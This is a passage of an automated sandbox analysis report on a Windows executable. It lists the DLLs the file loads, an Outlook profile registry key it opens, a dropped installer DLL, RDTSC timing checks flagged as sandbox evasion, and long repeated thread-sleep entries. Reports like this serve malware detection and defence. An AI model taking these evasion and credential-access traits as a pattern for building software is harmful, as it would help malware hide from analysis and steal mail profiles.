            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: 6ZoBPR3isG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.1650191934.0000000003386000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2616593291.00000000017C6000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 0_2_73F91B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73F91B5F
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36AE8BE0 push esp; iretd 3_2_36AE8BE1
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeFile created: C:\Users\user\AppData\Local\Temp\nsz9A57.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeAPI/Special instruction interceptor: Address: 3A76171
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeAPI/Special instruction interceptor: Address: 1EB6171
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeRDTSC instruction interceptor: First address: 3A3CFDF second address: 3A3CFDF instructions: 0x00000000 rdtsc 0x00000002 test bx, ax 0x00000005 cmp al, bl 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F080C6CC815h 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeRDTSC instruction interceptor: First address: 1E7CFDF second address: 1E7CFDF instructions: 0x00000000 rdtsc 0x00000002 test bx, ax 0x00000005 cmp al, bl 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F080C8B0E45h 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeMemory allocated: 34130000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeMemory allocated: 36130000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 599561Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 598795Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 598686Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 598250Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 597920Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 597811Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 597593Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 597375Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 597047Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 596828Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 596718Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 596603Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 596494Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 596390Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 596280Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 596172Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 595842Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 594750Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 594608Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 594047Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeWindow / User API: threadDelayed 7624Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeWindow / User API: threadDelayed 2221Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz9A57.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeAPI coverage: 2.5 %
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -27670116110564310s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7424Thread sleep count: 7624 > 30Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7424Thread sleep count: 2221 > 30Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -599671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -599561s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -599343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -599234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -599125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -599015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -598906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -598795s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -598686s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -598578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -598468s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -598359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -598250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -598140s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -598031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -597920s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -597811s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -597703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -597593s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -597484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -597375s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -597265s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -597156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -597047s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -596937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -596828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -596718s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -596603s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -596494s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -596390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -596280s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -596172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -596062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -595953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -595842s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -595734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -595625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -595515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -595406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -595297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -595187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -595078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -594968s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -594859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -594750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -594608s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392Thread sleep time: -594047s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_00402868 FindFirstFileW,3_2_00402868
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_0040672B FindFirstFileW,FindClose,3_2_0040672B
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405AFA
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 599561Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 598795Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 598686Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 598250Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 597920Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 597811Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 597593Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 597375Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 597047Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 596828Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 596718Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 596603Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 596494Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 596390Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 596280Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 596172Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 595842Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeThread delayed: delay time: 595625Jump to behavior
